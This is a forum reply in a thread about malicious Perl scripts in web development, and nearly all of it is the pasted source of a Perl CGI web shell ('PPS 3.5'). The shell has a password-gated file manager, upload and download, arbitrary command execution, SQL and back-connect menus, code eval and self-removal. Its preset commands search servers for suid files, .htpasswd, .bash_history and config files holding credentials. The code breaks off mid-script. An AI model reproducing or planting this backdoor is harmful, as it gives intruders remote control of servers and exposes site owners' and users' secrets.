Re^2: Malicious Perl Scripts & Web Development

in reply to Re: Malicious Perl Scripts & Web Development
in thread Malicious Perl Scripts & Web Development
here is the malicious script below
#!/usr/bin/perl
use strict;
undef $modules::Module::var;
my ($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$dive
+,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Re
+director,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$Hea
+derBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suff
+ixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$H
+tmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPasswo
+rd,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand
+,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$
+downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFi
+le,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$z
+apros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde
+,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetNa
+me,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$
+Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd):shared;
$Password="4c20bd58199372d362ad27c9e2fddef7";
$CommandTimeoutDuration=1000;
$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size
+=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive
+='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$U
+nixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmd
+Sep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirect
+or=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Ba
+se64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack(
+"H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $ur
+l1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ i
+f @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; 
+boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_S
+TRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $M
+ultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if(
+$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Bounda
+ry='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderB
+ody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'fileda
+ta'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list
+[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$v
+al=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c
+",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i(
+0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s
+/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$k
+ey}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="una
+me -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|se
+d 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if
+($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4}
+ {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub h
+ddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';
+$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfre
+e();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s
+.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0
+]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){retur
+n "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}
+}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{m
+y @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir
+($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse
+($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2"
+).'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td
+><form method=POST name='.$ii.'><input type=hidden name=a value=comma
+nd><input type=hidden name=d value='.$CurrentDir.'><input type=hidden
+ name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii
+.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($
+arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg))
+[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method
+="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input 
+type="hidden" name="a" value="RT"><input type="hidden" name="fdata" v
+alue='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod"
+ value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><
+a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><
+td><form method=POST name='.$ii.'z><input type=hidden name=zip value=
+'.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type
+=hidden name=a value=command><input type=hidden name=d value='.$Curre
+ntDir.'><input type=hidden name=c value=zip><a href="javascript:docum
+ent.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST nam
+e='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input
+ type=hidden name=a value=command><input type=hidden name=d value='.$
+CurrentDir.'><input type=hidden name=c value=unzip><a href="javascrip
+t:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form metho
+d=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name.
+'><input type=hidden name=a value=command><input type=hidden name=d v
+alue='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="
+javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font
+>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/10
+24;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=s
+printf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1"
+:"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></t
+h><td><form name='.$ii.' method=post><input type=hidden name=path id=
+view value='.$name.'><input type=hidden name=a value=view_file><input
+ type=hidden name=d value='.$CurrentDir.'><a href="javascript:documen
+t.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink
+($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg
+))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt meth
+od="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><inpu
+t type="hidden" name="a" value="RT"><input type="hidden" name="fdata"
+ value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmo
+d" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'
+><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td
+><td><form name='.$ii.'ed method=post><input type=hidden name=path id
+=edit1_file value='.$name.'><input type=hidden name=a value=edit_file
+_path><input type=hidden name=d value='.$CurrentDir.'><a href="javasc
+ript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.
+$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentD
+ir.'"><input type="hidden" name="a" value="download"><input type="hid
+den" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.s
+ubmit()">D </a></form></td><td><form method=POST name='.$ii.'z><input
+ type=hidden name=zip value='.$name.'><input type=hidden name=arh_nam
+e value='.$ii.'z><input type=hidden name=a value=command><input type=
+hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=z
+ip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></
+td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip
+_name value='.$name.'><input type=hidden name=a value=command><input 
+type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c va
+lue=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a
+></form></td><td><form method=POST name='.$ii.'del><input type=hidden
+ name=del_file value='.$name.'><input type=hidden name=a value=comman
+d><input type=hidden name=d value='.$CurrentDir.'><input type=hidden 
+name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()
+">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'}
+}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&0
+7777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(ge
+tpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0
+];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $
+mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(
+!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#F
+FD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>';
+}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font c
+olor=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font>
+</td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color=
+#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td>
+';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font
+ color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'
+.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>
+';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>
+'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$mo
+nth,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'
+.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02
+d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);
+return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$y
+ear,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.
+sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d
+",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);r
+eturn $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my 
+@list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $fil
+e ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}fo
+r $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @
+files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChar
+s($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSp
+ecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;}
$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print 
+"Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVED
+PWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentD
+ir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H
+*",$1)/eg;print <<END;
<html><head><title>PPS 3.5</title>$HtmlMetaHeader<style>body{backgroun
+d-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-dec
+oration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-a
+lign:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}
+span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border
+-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-c
+olor:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;backgr
+ound-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:
+none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;fo
+nt:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;ove
+rflow:auto;}.bigarea{width:100%;height:250px;}input,textarea,select{m
+argin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 
+9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:ce
+nter;}.toolsInp{width: 300px}.toolsInp1{border: none}.main th{text-al
+ign:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5
+e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-fa
+mily:Courier,Monospace;}</style></head><body onLoad="changeText();doc
+ument.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin
+="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3
+ cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hd
+d:<br>DateTime:<br>Pwd:</span></td><td><nobr>
END
P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);p
+rint " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddp
+roc`);print "% ]";$time=mt();print "<br>$time$tab <td>";my $cwd="";my
+ @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($Current
+Dir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0><
+td><form method=POST name=cwd0><a href="javascript:document.cwd0.subm
+it()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=
+hidden name=a value=command><input type=hidden name=d value='.$Curren
+tDir.'><input type=hidden name=c value="changedir"></form></td>';fore
+ach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form meth
+od=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submi
+t()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input typ
+e=hidden name=a value=command><input type=hidden name=d value='.$Curr
+entDir.'><input type=hidden name=c value="changedir"></form></td>';}}
+my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";pr
+int $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000>
+'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF
+>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>
+';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ]
+ </a></td></td>$tabe";print <<END;
</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SE
+RVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr><
+/td></tr>$tabe<table width=100% bgcolor=#444><td><form method="POST" 
+name=systeminfo><input type="hidden" name="a" value="systeminfo"><inp
+ut type=hidden name=d value=$CurrentDir><a href="javascript:document.
+systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><
+form method=POST name=files><input type=hidden name=cc value=$Current
+Dir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw 
+] $fe</a><input type=hidden name=a value=command><input type=hidden n
+ame=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentD
+ir"></form></td><td><form method="POST" name=consoler><input type="hi
+dden" name="a" value="console"><input type="hidden" name="d" value=$C
+urrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe 
+Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman>
+<input type=hidden name=d value=$CurrentDir><input type="hidden" name
+="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ 
+$fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backcon
+n><input type=hidden name=d value=$CurrentDir><input type="hidden" na
+me="a" value="net"><a href="javascript:document.backconn.submit()">$f
+w [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name
+=evalc><input type=hidden name=d value=$CurrentDir><input type="hidde
+n" name="a" value="code"><a href="javascript:document.evalc.submit()"
+>$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name
+=logout><input type="hidden" name="a" value="logout"><a href="javascr
+ipt:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></
+td><td><form method="POST" name=remove><input type="hidden" name="a" 
+value="remove"><a href="javascript:document.remove.submit()">$fw [ $f
+e Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C
+0C0C0" size="2">
END
}sub PrintLoginForm{print "<center><form name=f method=POST><input typ
+e=password name=p><input type=submit value='>>'></form></center>";}su
+b PrintPageFooter{print "</font></body></html>";}sub GetCookies{@http
+cookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies)
+{($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout
+{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print 
+"Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md
+5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5
+_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&Print
+CommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text
+/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");fi
+le_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCom
+mandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName 
+$CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type=
+hidden name=a value=command><input type=hidden name=d value=$CurrentD
+ir><select name=group><option value=delete>Delete</option><option val
+ue=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar.
+gz]</option></select><input type=submit value='>>' onclick='validate(
+)'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font co
+lor=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[
+Writeable]</font>';}}sub PrintVar{print <<END;
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  
+style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><
+td><form method=POST><span>Change dir:</span><br><input class=toolsIn
+p type=text name=cc value=$CurrentDir><input type=submit value='>>'><
+input type=hidden name=a value=command><input type=hidden name=d valu
+e=$CurrentDir><input type=hidden name=c value="changedir"></form></td
+><td><form method=POST><span>Read file:</span><br><input class='tools
+Inp' type=text name=path><input type=hidden name=a value=view_file><i
+nput type=hidden name=d value=$CurrentDir><input type=submit value='>
+>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span>
END
wr_cur();print <<END;
<br><input class='toolsInp' type=text name=md><input type=hidden name=
+a value=command><input type=hidden name=d value=$CurrentDir><input ty
+pe=hidden name=c value="makedir"><input type=submit value='>>'></form
+></td><td><form method=POST><span>Make file:</span>
END
wr_cur();print <<END;
<br><input class='toolsInp' type=text name=mf><input type=hidden name=
+a value=command><input type=hidden name=d value=$CurrentDir><input ty
+pe=hidden name=c value="makefile"><input type=submit value='>>'></for
+m></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</spa
+n><br><input type="hidden" name="a" value="command"><input type="hidd
+en" name="d" value="$CurrentDir"><input class='toolsInp' type=text na
+me=c value=''><input type=submit value='>>'></form></td>
<td>
END
&PrintFileUploadForm;print <<END;
</td>$tabe
END
}sub PrintFileUploadForm{print <<END;
<span>Upload file: </span>
END
wr_cur();print <<END;
<br><form name="upload_file_form" enctype="multipart/form-data" method
+="POST"><input type="file" name="f" class=toolsInp><input type="submi
+t" value=">>"><input type="hidden" name="d" value="$CurrentDir"><inpu
+t type="hidden" name="a" value="upload"></form><script>function setCo
+okie(name,value,expires,path,domain,secure){document.cookie=name+"="+
+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+pat
+h:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}functi
+on validate(form){var namelist='';var names=document.getElementsByNam
+e('lo');  var lo=document.getElementsByName('zip');for(var i=0;i<name
+s.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCoo
+kie("f",namelist,"","/");}function sall(form){var namelist='';var ch=
+true;var names=document.getElementsByName('lo');var ss=document.getEl
+ementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(va
+r i=0;i<names.length;i++){names[i].checked=ch;}}</script>
END
}&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord 
+$1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr
+(hex $1)/eg;return $str;}sub ConsoleP{print <<END;
<tr><td><form name="run" method="POST"><br><input type=text size="2" i
+d="sub3" disabled value='\$ '><input type="hidden" name="a" value="co
+mmand1"><input type="hidden" name="d" value="$CurrentDir"><input type
+=text name="c" size=100 class=toolsInp1 id='lsname' onkeypress="s(eve
+nt)" value=''><input type=submit class=toolsInp1 id="sub4" value=''><
+/form></td></tr>$tab<td><form name="alias" method="POST"><br><input t
+ype="hidden" name="a" value="command1"><input type="hidden" name="d" 
+value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp><
+option value="ls -lha">List dir</option><option value="lsattr -va">li
+st file attributes on a Linux second extended file system</option><op
+tion value="netstat -an | grep -i listen">show opened ports</option><
+option value="ps aux">process status</option><optgroup label="-Find-"
+></optgroup><option value="find / -type f -perm -04000 -ls">find all 
+suid files</option><option value="find . -type f -perm -04000 -ls">fi
+nd suid files in current dir</option><option value="find / -type f -p
+erm -02000 -ls">find all sgid files</option><option value="find . -ty
+pe f -perm -02000 -ls">find sgid files in current dir</option><option
+ value="find / -type f -name config.inc.php">find config.inc.php file
+s</option><option value="find / -type f -name &quot;config*&quot;">fi
+nd config* files</option><option value="find . -type f -name &quot;co
+nfig*&quot;">find config* files in current dir</option><option value=
+"find / -perm -2 -ls">find all writable folders and files</option><op
+tion value="find . -perm -2 -ls">find all writable folders and files 
+in current dir</option><option value="find / -type f -name service.pw
+d">find all service.pwd files</option><option value="find . -type f -
+name service.pwd">find service.pwd files in current dir</option><opti
+on value="find / -type f -name .htpasswd">find all .htpasswd files</o
+ption><option value="find . -type f -name .htpasswd">find .htpasswd f
+iles in current dir</option><option value="find / -type f -name .bash
+_history">find all .bash_history files</option><option value="find . 
+-type f -name .bash_history">find .bash_history files in current dir<
+/option><option value="find / -type f -name .fetchmailrc">find all .f
+etchmailrc files</option><option value="find . -type f -name .fetchma
+ilrc">find .fetchmailrc files in current dir</option><optgroup label=
+"-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.
+conf files</option><option value="locate vhosts.conf">locate vhosts.c
+onf files</option><option value="locate proftpd.conf">locate proftpd.
+conf files</option><option value="locate psybnc.conf">locate psybnc.c
+onf files</option><option value="locate my.conf">locate my.conf files
+</option><option value="locate admin.php">locate admin.php files</opt
+ion><option value="locate cfg.php">locate cfg.php files</option><opti
+on value="locate conf.php">locate conf.php files</option><option valu
+e="locate config.dat">locate config.dat files</option><option value="
+locate config.php">locate config.php files</option><option value="loc
+ate config.inc">locate config.inc files</option><option value="locate
+ config.inc.php">locate config.inc.php</option><option value="locate 
+config.default.php">locate config.default.php files</option><option v
+alue="locate config">locate config* files </option><option value="loc
+ate '.conf'">locate .conf files</option><option value="locate '.pwd'"
+>locate .pwd files</option><option value="locate '.sql'">locate .sql 
+files</option><option value="locate '.htpasswd'">locate .htpasswd fil
+es</option><option value="locate '.bash_history'">locate .bash_histor
+y files</option><option value="locate '.mysql_history'">locate .mysql
+_history files</option><option value="locate '.fetchmailrc'">locate .
+fetchmailrc files</option><option value="locate backup">locate backup
+ files</option><option value="locate dump">locate dump files</option>
+<option value="locate priv">locate priv files</option></select><input
+ type=submit id="sub2" value='>>'></form></td><td><form name="l11" me
+thod="POST"><br><input type="hidden" name="a" value="command1"><input
+ type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11'
+ class=toolsInp>
END
print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $ar
+g(@last){print "<option value=\"$arg\">$arg</option>";}print <<END;
</select><input type=submit id="sub5" value='>>'></form></td>$tabe<scr
+ipt>document.getElementById('sub3').style.borderColor='#444';document
+.getElementById('sub2').style.borderColor='#333';document.getElementB
+yId('lsname').style.borderColor='#333';document.getElementById('nnnam
+e').style.borderColor='#333';document.getElementById('sub4').style.bo
+rderColor='#333';document.getElementById("lsname").style.backgroundCo
+lor='#333';document.getElementById("l11").style.backgroundColor='#444
+4';document.getElementById("sub5").style.backgroundColor='#444';docum
+ent.getElementById('l11').style.borderColor='#444';document.getElemen
+tById('sub5').style.borderColor='#444';document.getElementById("sub3"
+).style.backgroundColor='#333';document.getElementById("sub3").style.
+borderColor='#333';document.getElementById("sub4").style.backgroundCo
+lor='#333';document.getElementById('lsname').focus();
function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.ke
+yCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selec
+tedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x
++1].text;document.getElementById("lsname").value=t;document.getElemen
+tById("l11").selectedIndex=document.getElementById("l11").selectedInd
+ex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value
+=t;document.getElementById("l11").selectedIndex=document.getElementBy
+Id("l11").selectedIndex-1;}}</script>$dive
END
&PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(
+!-w $_[0]){$wr='<font color=#FF0000>  Not writable</font>'}else{$wr='
+<font color=#25ff00>  Writeable</font>'}my $time=mt1((stat($_[0]))[8]
+);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ff
+s();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=spri
+ntf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024)).
+" MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9
+]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferF
+ile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $
+ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$ta
+b<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time:
+ $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding=
+0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-b
+ottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td
+><form name=run method=POST><input type=hidden name=a value=command><
+input type=hidden name=d value=$CurrentDir><input type=hidden name=c 
+value=rename_file><input type=hidden name=path value=".$_[0]."><input
+ type=text size=20 name=rename_file value=$TransferFile><input type=s
+ubmit value=RENAME></form></td><td><form name=run method=POST><input 
+type=hidden name=a value=command><input type=hidden name=d value=$Cur
+rentDir><input type=hidden name=c value=touch_file><input type=hidden
+ name=path value=".$_[0]."><input type=text size=20 name=touch_file v
+alue='$motime'><input type=submit value=TOUCH></form></td><td><form n
+ame=run method=POST><input type=hidden name=a value=command><input ty
+pe=hidden name=d value=$CurrentDir><input type=text size=20 name=chmo
+d value=$Fchmod><input type=hidden name=path value=".$_[0]."><input t
+ype=hidden name=c value=chmod_file><input type=submit value=CHMOD></f
+orm></td><td><form name=run method=POST><input type=hidden name=a val
+ue=download><input type=hidden name=f value=$TransferFile><input type
+=hidden name=d value=$CurrentDir><input type=hidden name=path value=$
+TransferFile><input type=submit value=DOWNLOAD></form></td><td><form 
+name=run method=POST><input type=hidden name=a value=view_file><input
+ type=hidden name=d value=$CurrentDir><input type=hidden name=path va
+lue=$TransferFile><input type=submit value=VIEW></form></td><td><form
+ name=run method=POST><input type=hidden name=a value=edit_file_path>
+<input type=hidden name=d value=$CurrentDir><input type=hidden name=p
+ath value=$TransferFile><input type=submit value=EDIT></form></td>$ta
+be</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$Curr
+entDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h
+1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($p
+ath);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "
+<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Couri
+er New';\">";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</font
+>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(
+0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDurati
+on second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print 
+"<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 
+cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx n
+ame=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Mo
+dify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr
+>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=leng
+th $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand
+."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END;
<script>function setCookie(name,value,expires,path,domain,secure){docu
+ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")
